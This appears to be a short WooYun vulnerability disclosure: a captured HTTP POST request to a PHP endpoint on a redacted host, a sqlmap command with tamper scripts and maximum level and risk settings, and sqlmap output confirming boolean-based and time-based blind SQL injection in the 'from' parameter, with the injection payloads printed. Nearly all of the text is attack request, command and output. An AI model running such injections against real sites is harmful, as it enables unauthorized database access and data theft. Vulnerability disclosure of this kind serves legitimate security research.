WooYun.org

POST /sunxf/ext/do/write.php HTTP/1.1
Content-Length: 175
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: **.**.**.**/
Cookie: PHPSESSID=4maesm6lo3c05rsfkicp9rk924
Host: **.**.**.**
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
action=query&condition=&from=1&pageIndex=0

sqlmap.py -r hah.txt --dbs -p from --tamper=space2comment,between --level 5 --risk 3 -D sunxf --count --is-dba

POST parameter 'from' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 436 HTTP(s) requests:
---
Parameter: from (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: action=query&condition=&from=-7389') OR 8183=8183 AND ('ewvE'='ewvE&pageIndex=0
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: action=query&condition=&from=1') OR SLEEP(5) AND ('PsWO'='PsWO&pageIndex=0
---
[21:59:25] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[21:59:25] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.5.24
back-end DBMS: MySQL 5.0.12